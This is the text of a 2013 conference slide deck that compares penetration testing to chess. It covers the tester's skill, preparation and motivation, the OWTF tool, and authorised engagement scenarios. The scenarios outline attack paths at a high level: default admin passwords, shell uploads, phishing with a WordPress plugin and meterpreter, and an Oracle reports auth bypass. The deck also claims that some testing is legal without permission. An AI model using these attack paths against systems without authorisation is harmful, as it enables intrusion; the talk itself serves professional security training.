Pentesting like a grandmaster BSides London 2013
-
Upload
abraham-aranguren -
Category
Technology
-
view
6.238 -
download
4
description
Transcript of Pentesting like a grandmaster BSides London 2013
![Page 1: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/1.jpg)
Pentesting like a Grandmaster
Abraham Aranguren@7a_ @owtfp
[email protected]://7-a.org
http://owtf.org
BSides London, 24th April 2013
![Page 2: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/2.jpg)
Agenda• Intro
• What makes a great player/tester
• Hacking is like Chess
• Intelligence = 1 variable
• Strength of Play Factors
1. Individual Skill
2. Game Preparation
3. Game Performance
• OWASP OWTF in 5 minutes
• Pwnage and WIN scenarios
• Conclusion
• Q&A
![Page 3: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/3.jpg)
About me• Spanish dude
• Uni: Degree, InfoSec research + honour mark
• IT: Since 2000, defensive sec as netadmin / developer
• (Offensive) InfoSec: Since 2007
• OSCP, CISSP, GWEB, CEH, MCSE, etc.
• WebAppSec and Dev/Architect
• Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
![Page 4: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/4.jpg)
Disclaimer I
I am..
• NOT a grandmaster
• NOT that smart
• NOT a rockstar like HD Moore, etc.
BUT using these techniques I could outperform people:
• Smarter than me
• With more experience than me
• Way more skilled than me
![Page 5: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/5.jpg)
Disclaimer IISome of the people I will use for examples have done
horrible/stupid/inappropriate things such as:
• Biting off somebody’s ear (Tyson)
• Having affairs outside of marriage (Arnold, Capablanca)
• Endorse Scientology (Will Smith)
• Anti-Semitism (Bobby Fischer), etc
This talk focuses on what it took these and other people to succeed and how we can learn from that ONLY
Celebrity FAIL would be a whole different talk ☺
![Page 6: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/6.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 7: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/7.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 8: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/8.jpg)
Hacking is like Chess
http://imgur.com/YAnUh
![Page 9: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/9.jpg)
Intelligence = 1 variableSo you watched these guys ...
… and (maybe) you thought: “I am just not smart enough…”
HD Moore Dan Kaminski
![Page 10: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/10.jpg)
How far can you get with
“modest intelligence”in life?
![Page 11: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/11.jpg)
Success is Possible
Success is possible for people with IQs < 160:• 78: Muhammad Ali: “The greatest of all time” � > 80%?• 98: George H.W. Bush: US president � > 70% people• 110: Dr. Karl: Science freak on Triple J � > 40% people• 135: Arnold Schwarzenegger: Success BEAST � 2% people• 135: Garry Kasparov: Word Chess Champion � 2% people
Recommended reading:http://garthzietsman.blogspot.com/2012/03/chess-intelligence-
and-winning.html
![Page 12: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/12.jpg)
High IQ != Guaranteed success
“Very high genius IQ”: A Motorcycle mechanic who hangs out with biker gangs and is frequently in and out of jail
“Highest IQ in North America”: A bouncer in a bar, minimum wage, lives in a tiny garage
http://iq-test.learninginfo.org/iq07.htm
![Page 13: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/13.jpg)
Chess ELO vs. IQ (rough)
Sources:http://www.sigmasociety.com/old/medias_qi.htmlhttp://www.jlevitt.dircon.co.uk/iq.htmhttp://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdfhttp://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
![Page 14: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/14.jpg)
Strength of PlayFactors
![Page 15: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/15.jpg)
Strength of Play FactorsMajor strength of play factors:1. Individual Skill: Years � Training, experience2. Game Preparation: Days/Weeks/Months � Game-specific3. Game Performance: 1 minute - 2.5 hours
Equal importance:• FAIL: Individual Skill without game preparation• FAIL: Game preparation without some Individual Skill• FAIL: Game performance without preparation or skill
NOTE: In Security testing “The Game” might be 5 days, 2 weeks, etc. but the same rules apply…
![Page 16: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/16.jpg)
1. Individual Skill
![Page 17: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/17.jpg)
Start Early = AdvantageMost World Chess Champions learned to play early:• 4 years old: Capablanca• 4 years old: Euwe• 4 years old: Karpov• 5 years old: Alekhine• 5 years old: Kasparov• 6 years old: Fischer• 8 years old: Tal
BUT some started a bit later:• 12 years old: BotvinnikSome argued this “weakness” showed in some of his games
Same goes for technology, programming, security, etc:Starting early == More total time to learn == Advantage
![Page 18: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/18.jpg)
Will Smith: Talent vs. Skill“… talent you have naturally, skill is only developed by
hours and hours and hours of beating on your craft. …where I excel is ridiculous, sickening, work ethic: While the other guy is sleeping I’m working, while the other guy is eating I’m working…”
“.. talent is going to fail you if you are not skilled: if you don’t study, if you don’t work really hard and dedicate yourself to being better every single day..”
http://www.youtube.com/watch?v=DNqQ5JAY88c
![Page 19: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/19.jpg)
Relentless Passion: Fischer
“You can only get good at chess if you love the game.”“Chess demands total concentration and a love for the game.”“I give 98 percent of my mental energy to chess. Others give
only 2 percent.”
![Page 20: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/20.jpg)
Relentless Passion: Larry
Larry Pesce from PaulDotCom (paraphrasing quote):
“…I just don’t stop: Since I wake up until I go to bed I am trying things out and doing research on my laptop, even beside my wife as she watches TV..”
![Page 21: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/21.jpg)
Rule 5: Work your butt off
“…Leaving no stone unturned… no pain no gain … so yeah .. Partying, washing around .. Someone out there at the same time is working hard, someone is getting smarter and someone is winning, just remember that … there is absolutely no way around hard hard work”
Arnold’s 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
![Page 22: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/22.jpg)
Pain is temporary: Ali“Pain is temporary, it may last a minute, an hour or even a
year, but eventually, it will subside and something else will take its place .. At the end of pain is success: You are not going down because you feel a little pain!”
“I’m exactly where I want to be because I realize I gotta commit my very being to this thing , I gottabreathe it, I gotta eat it, I gotta sleep it and until you get there you’ll never be successful in life but once you get there I guarantee you the world is yours so work hard and you can have whatever it is you want.”
http://www.youtube.com/watch?v=7pE4m2THO_U
![Page 23: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/23.jpg)
Discipline"...People who'd want to be in my shoes they really think so because they think: wow, they'd make money they'd be rich
BUT if they had to go through some of the things I had to go through I think they'd cry, sometimes is so depressive
... that's what discipline is, discipline is going in and doing something that you don't wanna do but you do it like you love it...“http://www.youtube.com/watch?v=drmBziMus9E
![Page 24: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/24.jpg)
What’s the difference“... these successful people realise that they have an allotted time to perform a given test so that they have to give it their absolute all to doing that test ...
…these people gave it their heart and their soul, throughout every single rep, every single set, every single gym session, every single day for weeks, for months, for years, for decades to get to where they were…
... that they were going to break through all mental barriers to get to where they wanted to be and that is the difference between the successful people and those who are not” - Jaret Grossman
http://www.youtube.com/watch?v=Sk56VxaeqEQ
![Page 25: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/25.jpg)
How to stay motivated
http://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focus
Your subconscious will believe what you tell it!.. and what others tell it too! (i.e. “you will never X”)
Repeating your goals to your subconscious builds drive:99% of successful people do this (consciously or not)
![Page 26: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/26.jpg)
Stay healthy
Dan Kaminski and Alex Hutton, enjoying a Mojito, Brucon 2011
![Page 27: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/27.jpg)
Dr Layne Norton PhD: Deadlift tips
“…staying healthy is a huge thing because if you are hurt, you can’t lift, you can’t get better … and consistency …you keep accumulating small improvements overtime…“
http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
![Page 28: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/28.jpg)
“Smart people learn from their own mistakes…… Really smart people learn from other people’s mistakes”
![Page 29: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/29.jpg)
Stay healthy: AlekhineWorld Champion 1927-35 + 1937-46
Loss of the title (1935): “Kmoch wrote that Alekhine drank no alcohol for the first half the match, but later took a glass before most games”http://en.wikipedia.org/wiki/Alexander_Alekhine
Recovery of the title (1937): “Euwe lost the title to Alekhine in a rematch in 1937, also played in The Netherlands, by the lopsided margin of 15½–9½. Alekhinehad given up alcohol to prepare for the rematch, although he would start drinking again later”http://en.wikipedia.org/wiki/Max_Euwe
![Page 30: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/30.jpg)
Stay healthy: TalCould the youngest* (24) Chess World Champion keep his crown
for more than 1 year? .. Of course! (*Kasparov’s 22 was later)
World Champion 1960–61
“…bohemian life of chess playing, heavy drinking and chain smoking.. his health suffered … spent much time in hospital.. remove a kidney in 1969… briefly addicted to morphine due to intense pain …On May 28, 1992, dying from kidney failure, left hospital to play at the Moscow blitz tournament, where he defeated Garry Kasparov”http://en.wikipedia.org/wiki/Mikhail_Tal
![Page 31: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/31.jpg)
Stay healthy: Fischer
World Champion 1972-75
“Before and during the match, Fischer paid special attention to his physical training and fitness, which was a relatively novel approach for top chess players at that time, He had developed his tennis skills to a good level, and played frequently …and swam for extended periods, usually late at night…”
http://en.wikipedia.org/wiki/Bobby_fischer
“Your body has to be in top condition. Your chess deteriorates as your body does. You can't separate body from mind.” – Bobby Fischer
![Page 32: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/32.jpg)
Stay healthy: Kasparov
World Champion 1985–2000
“Every morning, he ran barefoot for two and a half miles along the beach, and afterward he swam just beyond the breaking surf or played tennis on a court nestled in the woods behind the house..
After lunch and a nap, he spent five or six hours at the chessboard…”
http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
![Page 33: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/33.jpg)
Practical Tips“Just” (!) don’t stop:• Find things that motivate YOU and listen, etc to that:Search youtube for “motivation”, get mp3 from video, etc.• Read a lot: papers, presentations, PoCs, etc• Watch a lot: Webinars, Talks, demos• Practice a lot: Focus on what interests/motivates you• Listen a lot: InfoSec podcastsPodcasts are awesome to keep learning while you do you non-intellectual activities such as:Cooking, cleaning, tidying-up, driving, etc
If you are a podcaster:Minimise the fillers or you’ll lose your audience(skipping is annoying + unpractical while driving, etc)
![Page 34: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/34.jpg)
Don’t Fry your CNSIf you work hard be careful you don’t fry your CNS:Your central nervous system (CNS) has finite recovery ability
You know you’ve fried your CNS when:• You (surprisingly) get sick• Your mental/physical performance drops• Caffeine doesn’t work• You feel like you need to sleep all day: tiredness, etc
If this happens you need to:• Sleep without alarms for 10 days (try 1 x week after fix)• Clean-up your diet + Exercise• Caffeine: Avoid it or cycle itCycle caffeine on and off: Use “on” days and “off” daysUse caffeine early in the day: Clear it fully before sleep!
![Page 35: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/35.jpg)
Suggested watching
Awesome talk explaining what it takes to build up individual skill:
Haroon Meer - You and Your Research
http://www.youtube.com/watch?v=JoVx_-bM8Tg
Also worth a look:http://www.slideshare.net/reidhoffman/startup-of-you-visual-summary
![Page 36: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/36.jpg)
2. Game Preparation
Can happen:• Before the game / pentest:
Goals:• Scope better• Do better
2) During a tournament / pentest:Goals:• React to the unexpected• Avoid detection• Prepare an attack
![Page 37: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/37.jpg)
Chess Player approachChess players:• Memorise openings• Memorise endings• Memorise entire lines of attack/defence• Try hard to analyse games efficiently
Pen tester translation:• Chess players precompute all they can• Chess players analyse info only once
Chess player prep (simplified ☺):1. Find + prep exploits for opponent weaknesses2. Precompute an obscure opening: best replies
analysed at home for weeks/months3. Kick the opponent out of precomputation with it
![Page 38: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/38.jpg)
Alekhine vs CapablancaWorld Championship Match 1927
![Page 39: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/39.jpg)
Alekhine vs CapablancaWorld Championship Match 1927
.. Alekhine's victory surprised almost the entire chess world. Capablanca entered the match with no technical or physical preparation, while Alekhine got himself into good physical condition, and had thoroughly studied Capablanca's play.
According to Kasparov, Alekhine's research uncovered many small inaccuracies.
Luděk Pachman suggested that Capablanca, who was unaccustomed to losing games or to any other type of setback, became depressed over his unnecessary loss of the eleventh game..
http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_Capablanca
Physical Prep + Opponent Research + Mental toughness = WIN
![Page 40: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/40.jpg)
Garry Kasparov vs Nigel ShortWorld Championship Match 1993
![Page 41: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/41.jpg)
July 1993 FIDE (ELO) rating list. Top 10 players1 Kasparov, Gary.................... RUS 2815 ���� stronger2 Karpov, Anatoly................... RUS 2760
…10 Short, Nigel...................... ENG 2665 ���� weaker
http://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html
“In 1993 Nigel Short played Garry Kasparov .. Nigel Short had won matches against former world champion Anatoly Karpov and Jan Timmanon his way to meeting Kasparov.”
http://www.supreme-chess.com/famous-chess-players/nigel-short.html
Match Context
![Page 42: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/42.jpg)
Nigel Short’s Prep surprises Kasparov
“Kasparov was evidently disoriented as he used 1 hour 29 minutes to Short's 11 minutes(!) for the entire game.“� Short (weaker) was 8 times faster
http://www.chessgames.com/perl/chessgame?gid=1070677
![Page 43: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/43.jpg)
Kasparov + team strike back
“In just (!) 9 days after facing it for the first time …Kasparov and his team had found the best reply (11.Ne2 ) and even succeeded in completely bamboozling Short with 12.Be5” � “This move was a surprise for me. I spent 45 minutes on my reply. I could not fathom out the complications … “ – Nigel Short
http://www.chessgames.com/perl/chessgame?gid=1070681
![Page 44: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/44.jpg)
Anti-Chess Prep: Random Chess
Fischer complained … that because of the progress in openings and the memorization of opening books, the best players from history, if brought back from the dead to play today, would no longer be competitive.
"Some kid of fourteen today, or even younger, could get an opening advantage against Capablanca"
http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
�
![Page 45: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/45.jpg)
Pwn2Own: Headlines vs. PrepHeadline“Apple's Leopard hacked in 30 seconds”
http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/
RealityCharlie Miller on his own prep (2008):
“… It took us a couple of days to find something, then the rest of the week to work up an exploit and test it. It took us maybe a week altogether”
http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why-cansecwest-targets-apple/
Bottom line1 week of prep for a 30 second attack
![Page 46: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/46.jpg)
Pwn2Own: Stephen Fewer’s prep
“Fewer says that the successful exploit required use of three separate vulnerabilities: • Two to achieve successful code execution within the
browser• and then a third to escape Internet Explorer's
Protected Mode sandbox. Putting together the successful attack took Fewer five
to six weeks.”
http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
![Page 47: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/47.jpg)
Chris Nickerson on Prep
“.. If you do the proper intelligence gathering you can plan an attack that will work and I say that because you will NOT get stopped: … if you get stopped, it is your fault for not doing enough intelligence gathering so remember it next time”
http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
![Page 48: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/48.jpg)
Kevin Mitnick’s Prep
“.. we can setup their environment in our lab, and …we can …exploit our own environment … this was doing a lot of work prior to the attack: Finding out the AV, finding out the target system and working on bypassing UAC before the client was even hit … And then when we did the attack it worked flawlessly the first time … I think the upfront preparation is really critical to be successful in this stuff”
http://vimeo.com/31663242 - minutes: ~19 + 32:48
![Page 49: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/49.jpg)
OSCP results from 200824h hacking challenge: Nessus, etc. forbidden, scripts ok.
9-10 hours (test)19 hours (test)
5 hours (sleep)
24 hoursTime
100%100% ���� WTF?FAIL ���� WTF?Game
performance
?
(less than me?)
1-1,5 months
(with a day job)
0? (maybe only
studying?)
Game prep
7? (12 in 2013)< 1 year
(weak!)
5-10 years?Individual
Skill
Matteo Memelli
(ryujin)
Me (1st try)2 x respected
Security Pros
Strength of Play
Matteo was x2 faster, but you can’t get more than 100% ☺Game prep was critical to outperform stronger test takers
![Page 50: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/50.jpg)
My Strategy: Serious prepKnowing myself (Pre-prep self-feelings at the time)• Strength: Coding (dev background = edge over net guys)• Top Likely Weakness: Time (weaker = slower)
Knowing the “enemy” (The 24 hour hacking challenge)• Tough test: Most people failed (based on IRC)• Scripts allowed, Nessus, etc forbidden• Watch purehate’s videos, for ideas, etc � really helpful
Battle prep plan• Heavy Scripting: Reduce time for uncreative work• Heavy Practice:
Necessary to be faster on more creative/harder to automate work (exploitation, escalation, etc). All exercises, extra miles, etc.
• Podcast Abuse: 3 years of PaulDotCom in 1 month!
![Page 51: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/51.jpg)
Script 1: ProberProbe more likely open ports first until a full scan complete:• 1st wave: scan + probe top 100 TCP ports + SNMP
���� (awesome) results in 5 minutes!• 2nd wave: scan + probe next 900 TCP ports + few UDP• 3rd wave: scan remaining TCP ports (slower)• 4th wave: scan remaining UDP ports (super-slow)• For each wave: Group report ���� 1 thing to look at
Summary:• Staged: Fast results (5-10 minutes for 1st wave)• Reliable: Even monitored free RAM, etc. before launching things (to avoid crashing my own machine!)• Auto-Pilot: No supervision required (!babysitting)
![Page 52: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/52.jpg)
Script 2: ReporterA separate script generated partial reports at any time:I could see the partial probing results and work from there
very quickly though a clickable web page.No waiting until all the probes finished. ���� critical
![Page 53: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/53.jpg)
The Advantage of organised info
Others spent valuable energy to run (a lot of) tools by hand (12+ terminals open to babysit, etc)…
… I had this in < 10 minutes via scripts!:
![Page 54: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/54.jpg)
When Prep FAILsWhatever you do prep will fail sooner or later
Option 1) Take the hit: Consider nights, weekends, etc. this will pay off in the test and your future assessments, view it as a "paid training opportunity“
Option 2) Ask for an extension: Find a good reason + Negotiate an extension with your customer
Option 3) Ask for a delay: Take the hit without disrupting your life that much (maybe ☺)
Option 4) All of the above ☺
![Page 55: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/55.jpg)
3. Game Performance
![Page 56: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/56.jpg)
http://www.securitygeneration.com/security/pic-of-the-week-real-world-penetration-testing/
![Page 57: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/57.jpg)
http://www.slideshare.net/bsideslondon/breaking-entering-and-pentesting
![Page 58: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/58.jpg)
Mental Toughness: KarpovKarpov: World Champion 1975–85…
“.. I could resist in positions where other players probably would resign. And I was finding interesting ideas on how to defend difficult positions and I could save many games. ..I never gave up…you try to find the best move whatever the position is, because many people they say, okay, this is bad and then they lose will to fight. I never lost the will to fight.”
http://bigthink.com/videos/the-value-of-mental-toughness
![Page 59: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/59.jpg)
Efficient Chess Analysis
From Alexander Kotov - "Think like a Grandmaster":
1) Draw a list of candidate moves (3-4) � 1st Sweep (!deep)
2) Analyse each variation only once (!) � 2nd Sweep (deep)
3) After step 1 and 2 make a move
1) Draw up a list of candidate paths of attack
2) Analyse [ tool output + other info ] once and only once
3) After 1) and 2) exploit the best path of attack
Ever analysed X in depth to only see “super-Y” later?
![Page 60: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/60.jpg)
In 5 minutes
Putting it all together:
![Page 61: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/61.jpg)
Plugin Types (-t)At least 50% (32 out of 64) of the tests in the OWASP Testing guide can be legally* performed at least partially without permission
* Except in Spain, where visiting a page can be illegal ☺* This is only my interpretation and not that of my employer + might not apply to your country!
![Page 62: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/62.jpg)
A Pentester “cheating try”Offensive (Web) Testing Framework = Multi-level “cheating” tactics
![Page 63: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/63.jpg)
OWTF’s Chess-like approach
Kasparov against Deep Blue - http://www.robotikka.com
![Page 64: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/64.jpg)
Scenario 1: Summary
Pre-Engagement: No permission to test ���� Game prep
1) Run passive plugins � legit + no traffic to targetSitefinity CMS found
2) Identify best path of attack: • Sitefinity default admin password• Public sitefinity shell upload exploits
Engagement: Permission to test ���� Game performance
1) Try best path of attack first
![Page 65: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/65.jpg)
Scenario 1: Demo
![Page 66: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/66.jpg)
Scenario 1: Outcome
!!1 minute after getting permission …
![Page 67: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/67.jpg)
Scenario 1: Outcome
!!5 minutes after getting permission …
![Page 68: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/68.jpg)
Scenario 2: SummaryAttack preparation (pre-engagement safe) ���� Game prep1) Run semi-passive plugins � legitMissconfigured crossdomain, fingerprint wordpress version2) Identify best path of attack: crossdomain + phishing + wordpress plugin upload + meterpreter3) Replicate customer environment in lab4) Prep attack: Adapt public payloads to target5) Test in lab
Launching the attack ���� Game performance1) Tested attack works flawlessly on the first shot2) Pivot3) Show impact
![Page 69: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/69.jpg)
Scenario 2: Demo
![Page 70: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/70.jpg)
Scenario 3: SummaryPre-Engagement: No permission to test ���� Game prep1) Mapping the application you notice….. https://target.com/reports/rwservlet/Auth bypass vuln by design: Oracle reports accessible without auth
2) Identify best path of attack: Use the reporting GUI ☺
Engagement: Permission to test ���� Game performance1) Pwn customer on “minute 1”:Use the reporting GUI ☺
![Page 71: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/71.jpg)
Scenario 3: Impact
![Page 72: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/72.jpg)
Scenario 3: Impact
![Page 73: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/73.jpg)
Scenario 3: Vuln Examples ☺
